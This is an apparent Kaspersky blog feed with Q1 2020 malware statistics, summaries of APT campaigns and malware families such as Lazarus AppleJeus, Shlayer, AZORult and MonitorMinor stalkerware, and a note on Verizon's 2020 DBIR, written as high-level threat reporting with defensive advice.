Name Verdicts %* 1 Emotet Backdoor.Win32.Emotet 21.3 2 Zbot Trojan.Win32.Zbot 20.8 3 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 17.2 4 RTM Trojan-Banker.Win32.RTM 12.3 5 Nimnul Virus.Win32.Nimnul 3.6 6 Trickster Trojan.Win32.Trickster 3.6 7 Neurevt Trojan.Win32.Neurevt 3.3 8 SpyEye Trojan-Spy.Win32.SpyEye 2.3 9 Danabot Trojan-Banker.Win32.Danabot 2.0 10 Nymaim Trojan.Win32.Nymaim 1.9

** Unique users attacked by this malware family as a percentage of all users attacked by financial malware.

Ransomware programs Quarterly highlights

Ransomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.

More and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.

Number of new modifications

In Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new ransomware modifications detected, Q1 2019 – Q1 2020 (download)

Number of users attacked by ransomware trojans

In Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by ransomware trojans, Q1 2020 (download)

Attack geography

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of attacks by ransomware trojans, Q1 2020 (download)

Top 10 countries attacked by ransomware trojans

Country* %** 1 Bangladesh 6.64 2 Uzbekistan 1.98 3 Mozambique 1.77 4 Ethiopia 1.67 5 Nepal 1.34 6 Afghanistan 1.31 7 Egypt 1.21 8 Ghana 0.83 9 Azerbaijan 0.81 10 Serbia 0.74

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware trojans Name Verdicts %* 1 WannaCry Trojan-Ransom.Win32.Wanna 19.03 2 (generic verdict) Trojan-Ransom.Win32.Gen 16.71 3 (generic verdict) Trojan-Ransom.Win32.Phny 16.22 4 GandCrab Trojan-Ransom.Win32.GandCrypt 7.73 5 Stop Trojan-Ransom.Win32.Stop 6.62 6 (generic verdict) Trojan-Ransom.Win32.Encoder 4.28 7 (generic verdict) Trojan-Ransom.Win32.Crypren 4.15 8 PolyRansom/VirLock Virus.Win32.PolyRansom,

Trojan-Ransom.Win32.PolyRansom 2.96 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.02 10 (generic verdict) Trojan-Ransom.Win32.Generic 1.56

* Unique Kaspersky users attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans.

Miners Number of new modifications

In Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new miner modifications, Q1 2020 (download)

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by miners, Q1 2020 (download)

Attack geography

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of miner attacks, Q1 2020 (download)

Top 10 countries attacked by miners

Country* %** 1 Afghanistan 6.72 2 Ethiopia 4.90 3 Tanzania 3.26 4 Sri Lanka 3.22 5 Uzbekistan 3.10 6 Rwanda 2.56 7 Vietnam 2.54 8 Kazakhstan 2.45 9 Mozambique 1.96 10 Pakistan 1.67

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

We already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was CVE-2017-11882, which is related to a stack overflow error in the Equation Editor component. Hard on its heels was CVE-2017-8570, which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as CVE-2018-0802 and CVE-2017-8759, were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user’s system becomes infected.

In second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What’s more, some of the vulnerabilities were used in APT attacks, such as CVE-2020-0674, which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified CVE-2019-17026, a data type mismatch vulnerability in Mozilla Firefox’s JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability CVE-2020-6418 in the JavaScript engine; in addition, the dangerous RCE vulnerability CVE-2020-0767 was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of exploits used in attacks by type of application attacked, Q1 2020 (download)

This quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.

  • CVE-2020-0601 is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.
  • CVE-2020-0729 is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.
  • CVE-2020-0688 is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.

Various network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability CVE-2020-0796 (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution, in which regard the attacker does not even need to know the username/password combination (since the error occurs before the authentication stage); however, it is present only in Windows 10. In Remote Desktop Gateway there were found two critical vulnerabilities (CVE-2020-0609 and CVE-2020-0610) enabling an unauthorized user to execute remote code in the target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of web-based attack sources by country, Q1 2020 (download)

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users** 1 Bulgaria 13.89 2 Tunisia 13.63 3 Algeria 13.15 4 Libya 12.05 5 Bangladesh 9.79 6 Greece 9.66 7 Latvia 9.64 8 Somalia 9.20 9 Philippines 9.11 10 Morocco 9.10 11 Albania 9.09 12 Taiwan, Province of China 9.04 13 Mongolia 9.02 14 Nepal 8.69 15 Indonesia 8.62 16 Egypt 8.61 17 Georgia 8.47 18 France 8.44 19 Palestine 8.34 20 Qatar 8.30

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data.

On average, 6.56% of Internet user’ computers worldwide experienced at least one Malware-class attack.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of malicious web-based attacks, Q1 2020 (download)

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q1 2020, our File Anti-Virus registered 164,653,290 malicious and potentially unwanted objects. 

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Afghanistan 52.20 2 Tajikistan 47.14 3 Uzbekistan 45.16 4 Ethiopia 45.06 5 Myanmar 43.14 6 Bangladesh 42.14 7 Kyrgyzstan 41.52 8 Yemen 40.88 9 China 40.67 10 Benin 40.21 11 Mongolia 39.58 12 Algeria 39.55 13 Laos 39.21 14 Burkina Faso 39.09 15 Malawi 38.42 16 Sudan 38.34 17 Rwanda 37.84 18 Iraq 37.82 19 Vietnam 37.42 20 Mauritania 37.26

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked as a percentage of all unique users of Kaspersky products in the country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of local infection attempts, Q1 2020 (download)

Overall, 19.16% of user computers globally faced at least one Malware-class local threat during Q1.

2020. május 20.

IT threat evolution Q1 2020

Targeted attacks and malware campaigns Operation AppleJeus: the sequel

In 2018, we published a report on Operation AppleJeus, one of the more notable campaigns of the threat actor Lazarus, currently one of the most active and prolific APT groups. One notable feature of this campaign was that it marked the first time Lazarus had targeted macOS targets, with the group inventing a fake company in order to deliver its manipulated application and exploit the high level of trust among potential victims.

Our follow-up research revealed significant changes to the group’s attack methodology. To attack macOS victims, Lazarus has developed homemade macOS malware and added an authentication mechanism to deliver the next stage payload very carefully, as well as loading the next-stage payload without touching the disk. In addition, to attack Windows victims, the group has elaborated a multi-stage infection procedure and made significant changes to the final payload. We believe Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection.

We identified several victims as part of our ongoing research, in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency business organizations.

Roaming Mantis turns to SMiShing and enhances anti-researcher techniques

Kaspersky continues to track the Roaming Mantis campaign. This threat actor was first reported in 2017, when it used SMS to distribute its malware to Android devices in just one country – South Korea. Since then, the scope of the group’s activities has widened considerably. Roaming Mantis now supports 27 languages, targets iOS as well as Android and includes cryptocurrency mining for PCs in its arsenal.

Roaming Mantis is strongly motivated by financial gain and is continuously looking for new targets. The group has also put a lot of effort into evading tracking by researchers, including implementing obfuscation techniques and using whitelisting to avoid infecting researchers who navigate to the malicious landing page. While the group is currently applying whitelisting only to Korean pages, we think it is only a matter of time before Roaming Mantis implements this for other languages.

Roaming Mantis has also added new malware families, including Fakecop and Wroba.j. The actor is still very active in using ‘SMiShing‘ for Android malware distribution. This is particularly alarming, because it means that the attackers could combine infected mobile devices into a botnet for malware delivery, SMiShing, and so on. In one of the more recent methods used by the group, a downloaded malicious APK file contains an icon that impersonates a major courier company brand: the spoofed brand icon is customized for the country it targets – for example, Sagawa Express for Japan, Yamato Transport and FedEx for Taiwan, CJ Logistics for South Korea and Econt Express for Russia.

WildPressure on industrial networks in the Middle East

In March, we reported a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. We detected the first signs of this operation, which we have dubbed WildPressure, in August 2019; and the campaign remains active.

The Milum samples that we have seen so far do not share any code similarities with any known APT campaigns. All of them allow the attackers to control infected devices remotely: letting them download and execute commands, collect information from the compromised computer and send it to the C2 server and install upgrades to the malware.

Attacks on industrial targets can be particularly devastating. So far, we haven’t seen evidence that the threat actor behind WildPressure is trying to do anything beyond gathering data from infected networks. However, the campaign is still in development, so we don’t yet know what other functionality might be added.

To avoid becoming a victim of this and other targeted attacks, organizations should do the following.

  • Update all software regularly, especially when a new patch becomes available.
  • Deploy a security solution with a proven track record, such as Kaspersky Endpoint Security, that is equipped with behavior-based protection against known and unknown threats, including exploits.
  • On top of endpoint protection, implement a corporate-grade security solution designed to detect advanced threats against the network, such as Kaspersky Anti Targeted Attack Platform.
  • Ensure staff understand social engineering and other methods used by attackers and develop a security culture within in the organization.
  • Provide your security team with access to comprehensive cyberthreat intelligence, such as Kaspersky APT Intelligence Reporting.
TwoSail Junk

On January 10, we discovered a watering-hole attack that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. Judging by the content of the landing page, the site appears to have been designed to target users in Hong Kong.

Since then, we have released two private reports on LightSpy, available to customers of Kaspersky Intelligence Reporting (please contact intelreports@kaspersky.com for further information).

We are temporarily calling the APT group behind this implant TwoSail Junk. Currently, we have hints from known backdoor callbacks to infrastructure about clustering this campaign with previous activity. We are also working with fellow researchers to tie LightSpy to prior activity from a well-established Chinese-speaking APT group, previously reported (here and here) as Spring Dragon (aka Lotus Blossom and Billburg(Thrip)), known for its Lotus Elise and Evora backdoors.

As this LightSpy activity was disclosed publicly by fellow researchers from Trend Micro, we wanted to contribute missing information to the story without duplicating content. In addition, in our quest to secure technologies for a better future, we have reported this malware and activity to Apple and other relevant companies.

Our report includes information about the Android implant, including its deployment, spread and support infrastructure.

A sprinkling of Holy Water in Asia

In December, we discovered watering-hole websites that were compromised to selectively trigger a drive-by download attack with fake Adobe Flash update warnings.

This campaign, which has been active since at least May 2019, targets an Asian religious and ethnic group. The threat actor’s unsophisticated but creative toolset, which has evolved greatly and may still be in development, makes use of Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language and Google Drive-based C2 channels.

The threat actor’s operational target is unclear because we haven’t been able to observe many live operations. We have also been unable to identify any overlap with known APT groups.

Threat hunting with Bitscout

In February, Vitaly Kamluk, from the Global Research and Analysis Team at Kaspersky, reported on a new version of Bitscout, based on the upcoming release of Ubuntu 20.04 (scheduled for release in April 2020).

Bitscout is a remote digital forensics tool that we open-sourced about two and a half years ago, when Vitaly was located in the Digital Forensics Lab at INTERPOL. Bitscout has helped us in many cyber-investigations. Based on the widely popular Ubuntu Linux distribution, it incorporates forensics and malware analysis tools created by a large number of excellent developers around the world.

Here’s a summary of the approach we use in Bitscout

  • Bitscout is completely FREE, thereby reducing your forensics budget.
  • It is designed to work remotely, saving time and money that would otherwise be spent on travel. Of course, you can use the same techniques locally.
  • The true value lies not in the toolkit itself, but in the power of all the forensic tools that are included.
  • There’s a steep learning curve involved in mastering Bitscout, which ultimately reinforces the technical foundations of your experts.
  • Bitscout records remote forensics sessions internally, making it perfect for replaying and learning from more experienced practitioners or using as evidential proof of discovery.
  • It is fully open source, so you don’t need to wait for the vendor to implement a patch or feature for you: you are free to reverse-engineer and modify any part of it.

We have launched a project website, bitscout-forensics.info, as the go-to destination for those looking for tips and tricks on remote forensics using Bitscout.

Hunting APTs with YARA

In recent years, we have shared our knowledge and experience of using YARA as a threat hunting tool, mainly through our training course, ‘Hunting APTs with YARA like a GReAT ninja’, delivered during our Security Analyst Summit. However, the COVID-19 pandemic has forced us to postpone the forthcoming SAS.

Meanwhile, we have received many requests to make our YARA hands-on training available to more people. This is something we are working on and hope to be able to provide soon as an online training experience. Look out for updates on this by following us on Twitter – @craiu, @kaspersky.

With so many people working from home, and spending even more time online, it is also likely the number of threats and attacks will increase. Therefore, we decided to share some of the YARA experience we have accumulated in recent years, in the hope that all of you will find it useful for keeping threats at bay.

If you weren’t able to join the live presentation, on March 31, you can find the recording here.

We track the activities of hundreds of APT threat actors and regularly highlight the more interesting findings here. However, if you want to know more, please reach out to us at intelreports@kaspersky.com

Other security news Shlayer Trojan attacks macOS users

Although many people consider macOS to be safe, there are cybercriminals who seek to exploit those who use this operating system. One malicious program stands out – the Shlayer Trojan. In 2019, Kaspersky macOS products blocked this Trojan on every tenth device, making this the most widespread threat to people who use macOS.

Shlayer is a smart malware distribution system that spreads via a partner network, entertainment websites and even Wikipedia. This Trojan specializes in the installation of adware – programs that feed victims illicit ads, intercepting and gathering their browser queries and modifying search results to distribute even more advertising messages.

Shlayer accounted for almost one-third of all attacks on macOS devices registered by Kaspersky products between January and November last year – and nearly all other top 10 macOS threats were adware programs that Shlayer installs.

The infection starts with an unwitting victim downloading the malicious program. The criminals behind Shlayer set up a malware distribution system with a number of channels leading their victims to download the malware. Shlayer is offered as a way to monetize websites in a number of file partner programs, with relatively high payment for each malware installation made by users in the US, prompting over 1,000 ‘partner sites’ to distribute Shlayer. This scheme works as follows: a user looks for a TV series episode or a football match, and advertising landing pages redirect them to fake Flash Player update pages. From here, the victim downloads the malware; and for each installation, the partner who distributed links to the malware receives a pay-per-install payment.

Other schemes that we saw led to a fake Adobe Flash update page that redirected victims from various large online services with multi-million audiences, including YouTube, where links to the malicious website were included in video descriptions, and Wikipedia, where such links were hidden in article references. People that clicked on these links would also be redirected to the Shlayer download landing pages. Kaspersky researchers found 700 domains containing malicious content, with links to them on a variety of legitimate websites.

Almost all the websites that led to a fake Flash Player contained content in English. This corresponds to the countries where we have seen most infections – the US (31%), Germany (14%), France (10%) and the UK (10%).

Blast from the past

Although many people still use the term “virus” to mean any malicious program, it actually refers specifically to self-replicating code, i.e., malicious code that copies itself from file to file on the same computer. Viruses, which used to dominate the threat landscape, are now rare. However, there are some interesting exceptions to this trend and we came across one recently – the first real virus we’ve seen in the wild for some time.

The virus, called KBOT, infects the victim’s computer via the internet, a local network, or infected external media. After the infected file is launched, the malware gains a foothold in the system, writing itself to Startup and the Task Scheduler, and then deploys web injects to try to steal the victim’s bank and personal data. KBOT can also download additional stealer modules that harvest and send to the Command-and-Control (C2) server comprehensive information about the victim, including passwords/logins, crypto-wallet data, lists of files and installed applications, and so on. The malware stores all its files and stolen data in a virtual file system, encrypted using the RC6 algorithm, making it hard to detect.

Cybercriminals exploiting fears about data breaches

Phishers are always on the lookout for hot topics that they can use to hook their victims, including sport, politics, romance, shopping, banking, natural disasters and anything else that might entice someone into clicking on a link or malicious file attachment.

Recently, cybercriminals have exploited the theme of data leaks to try to defraud people. Data breaches, and the fines imposed for failing to safeguard data, are now a staple feature of the news. The scammers posed as an organization called the “Personal Data Protection Fund” and claim that the “US Trading Commission” had set up a fund to compensate people whose personal data had been exposed.

However, in order to get the compensation, the victims are asked to provide a social security number. The scammers offer to sell a temporary SSN to those who don’t have one.

Even if the potential victim enters a valid SSN, they are still directed to a page asking them to purchase a temporary SSN.

You can read the full story here.

… and coronavirus

The bigger the hook, the bigger the pool of potential victims. So it’s no surprise that cybercriminals are exploiting the COVID-19 pandemic. We have found malicious PDF, MP4 and DOCX files disguised as information about the coronavirus. The names of the files suggest they contain video instructions on how to protect yourself, updates on the threat and even virus detection procedures. In fact, these files are capable of destroying, blocking, modifying or copying data, as well as interfering with the operation of the computer.

The cybercriminals behind the Ginp banking Trojan recently developed a new campaign related to COVID-19. After receiving a special command, the Trojan opens a web page called Coronavirus Finder. This provides a simple interface that claims to show the number of people nearby who are infected with the virus and asks you to pay a small sum to see their location.

The Trojan then provides a payment form.

Then … nothing else happens – apart from the criminals taking your money. Data from the Kaspersky Security Network suggests that most users who have encountered Ginp are located in Spain. However, this is a new version of Ginp that is tagged “flash-2”, while previous versions were tagged “flash-es12”. So perhaps the lack of “es” in the tag of the newer version means the cybercriminals are planning to expand their campaign beyond Spain.

We have also seen a number of phishing scams where cybercriminals pose as bona fide organizations to trick people into clicking on links to fake sites where the scammers capture their personal information, or even ask them to donate money.

If you’ve ever wanted to know why it’s so easy for phishers to create spoof emails, and what efforts have been made to make it harder for them, you can find a good overview of the problems and potential solutions here.

Cybercriminals are also taking the opportunity to attack the information infrastructure of medical facilities, clearly hoping that the overload on IT services will provide them with an opportunity to break into hospital networks, or are attempting to extort money from clinical research companies. In an effort to ensure that IT security isn’t something that medical teams have to worry about, we’re offering medical institutions free six-month licenses for our core solutions.

AZORult campaign abuses popular VPN service to steal crypto-currency

In February, we reported an unusual malware campaign in which cybercriminals were spreading the AZORult Trojan as a fake installer for ProtonVPN.

The aim of the campaign is to steal personal information and crypto-currency from the victims.

The attackers created a spoof copy a VPN service’s website, which looks like the original but has a different domain name. The criminals spread links to the domain through advertisements using different banner networks – a practice known as malvertizing. When someone visits a phishing website, they are prompted to download a free VPN installer for Windows. Once launched, this drops a copy of the AZORult botnet implant. This collects the infected device’s environment information and reports it to the server. Finally, the attackers steal crypto-currency from locally available wallets (Electrum, Bitcoin, Etherium and others), FTP logins, and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), credentials from WinSCP, Pidgin messenger and others.

AZORult is one of the most commonly bought and sold stealers on Russian forums due to its wide range of capabilities. The Trojan is able to harvest a good deal of data, including browser history, login credentials, cookies, files and crypto-wallet files; and can also be used as a loader to download other malware.

Distributing malware under the guise of security certificates

Distributing malware under the guise of legitimate software updates is not new. Typically, cybercriminals invite potential victims to install a new version of a browser or Adobe Flash Player. However, we recently discovered a new approach: visitors to infected sites were informed that some kind of security certificate had expired.

They were offered an update that infected them with malware – specifically the Buerak downloader and Mokes backdoor.

We detected the infection on variously themed websites – from a zoo to a store selling auto parts. The earliest infections that we found date back to January 16.

Mobile malware sending offensive messages

We have seen many mobile malware apps re-invent themselves, adding new layers of functionality over time. The Faketoken Trojan offers a good example of this. Over the last six years, it has developed from an app designed to capture one-time passcodes, to a fully-fledged mobile banking Trojan, to ransomware. By 2017, Faketoken was able to mimic many different apps, including mobile banking apps, e-wallets, taxi service apps and apps used to pay fines and penalties – all in order to steal bank account data.

Recently, we observed 5,000 Android smartphones infected by Faketoken sending offensive text messages. SMS capability is a standard feature of many mobile malware apps, many of which spread by sending links to their victims’ contacts; and banking Trojans typically try to make themselves the default SMS application, in order to intercept one-time passcodes. However, we had not seen one become a mass texting tool.

The messages sent by Faketoken are charged to the owner of the device; and since many of the infected smartphones we saw were texting a foreign number, the cost was quite high. Before sending any messages, the Trojan checks to see if there are sufficient funds in the victim’s bank account. If there are, Faketoken tops up the mobile account sending any messages.

We don’t yet know whether this is a one-off campaign or the start of a trend. To avoid becoming a victim of Faketoken, download apps only from Google Play, disable the downloading of apps from other sources, don’t follow links from messages and protect your device with a reputable mobile security product.

The use and abuse of the Android AccessibilityService

In January, we reported that cybercriminals were using malware to boost the rating of specific apps, to increase the number of installations.

The Shopper.a Trojan also displays advertising messages on infected devices, creates shortcuts to advertising sites and more.

The Trojan opens Google Play (or other app store), installs several programs and writes fake user reviews about them. To prevent the victim noticing, the Trojan conceals the installation window behind an ‘invisible’ window. Shopper.a gives itself the necessary permissions using the Android AccessibilityService. This service is intended to help people with disabilities use a smartphone, but if a malicious app obtains permission to use it, the malware has almost limitless possibilities for interacting with the system interface and apps – including intercepting data displayed on the screen, clicking buttons and emulating user gestures.

Shopper.a was most widespread in Russia, Brazil and India.

You should be wary if an app requests access to the AccessibilityService but doesn’t need it. Even if the only danger posed by such apps comes from automatically written reviews, there is no guarantee that its creators will not change the payload later.

Everyone loves cookies – including cybercriminals

We recently discovered a new malicious Android Trojan, dubbed Cookiethief, designed to acquire root permissions on the victim’s device and transfer cookies used by the browser and the Facebook app to the cybercriminals’ C2 server. Using the stolen cookies, the criminals can gain access to the unique session IDs that websites and online services use to identify someone, thereby allowing the criminals to assume someone’s identity and gain access to online accounts without the need for a login and password.

On the C2 server, we found a page advertising services for distributing spam on social networks and messengers, which we think is the underlying motive in stealing cookies.

From the C2 server addresses and encryption keys used, we were able to link Cookiethief to widespread Trojans such as Sivu, Triada, and Ztorg. Usually, such malware is either planted in the device firmware before purchase, or it gets into system folders through vulnerabilities in the operating system and then downloads various applications onto the system.

Stalkerware: no place to hide

We recently discovered a new sample of stalkerware – commercial software typically used by those who want to monitor a partner, colleague or others – that contains functionality beyond anything we have seen before. You can find more information on stalkerware here and here.

MonitorMinor, goes beyond other stalkerware programs. Primitive stalkerware uses geo-fencing technology, enabling the operator to track the victim’s location, and in most cases intercept SMS and call data. MonitorMinor goes a few steps further: recognizing the importance of messengers as a means of data collection, this app aims to get access to data from all the popular modern communication tools.

Normally, the Android sandbox prevents direct communication between apps. However, if a superuser app has been installed, which grants root access to the system, it overrides the security mechanisms of the device. The developers of MonitorMinor use this to enable full access to data on a variety of popular social media and messaging applications, including Hangouts, Instagram, Skype and Snapchat. They also use root privileges to access screen unlock patterns, enabling the stalkerware operator to unlock the device when it is nearby or when they next have physical access to the device. Kaspersky has not previously seen this feature in any other mobile threat.

Even without root access, the stalkerware can operate effectively by abusing the AccessibilityService API, which is designed to make devices friendly for users with disabilities. Using this API, the stalkerware is able to intercept any events in the applications and broadcast live audio.

Our telemetry indicates that the countries with the largest share of installations of MonitorMinor are India, Mexico, Germany, Saudi Arabia and the UK.

We recommend the following tips to reduce the risk of falling victim to a stalker:

  • Block the installation of apps from unknown sources in your smartphone settings.
  • Never disclose the password or passcode to your mobile device, even with someone you trust.
  • If you are ending a relationship, change security settings on your mobile device, such as passwords and app location access settings.
  • Keep a check on the apps installed on your device, to see if any suspicious apps have been installed without your consent
  • Use a reliable security solution that notifies you about the presence of commercial spyware programs aimed at invading your privacy, such as Kaspersky Internet Security.
  • If you think you are being stalked, reach out to a professional organization for advice.
  • For further guidance, contact the Coalition against Stalkerware
  • There are resources that can assist victims of domestic violence, dating violence, stalking and sexual violence. If you need further help, please contact the Coalition against Stalkerware.
2020. május 19.

Verizon’s 2020 DBIR

Verizon’s 2020 DBIR is out, you can download a copy or peruse their publication online. Kaspersky was a contributor once again, and we are happy to provide generalized incident data from our unique and objective research.

We have contributed to this project and others like it for years now. This year’s ~120 page report analyses data from us and 80 other contributors from all over the world. The team provides thoughts on a mountain of breach data – “This year, we analyzed a record total of 157,525 incidents. Of those, 32,002 met our quality standards and 3,950 were confirmed data breaches”. And this year, Verizon pulled in far more data on cybercrime breaches. We include a few interesting notes here:

  • 70% of reported breaches were perpetrated by external actors
  • a majority of breaches do not just involve a dropped trojan
  • 86% of breaches were financially motivated
  • 81% of breaches were contained in days or less
  • defenders are up against organized crime
  • almost a third of reported breaches involved ransomware
2020. május 14.

Cyberthreats on lockdown

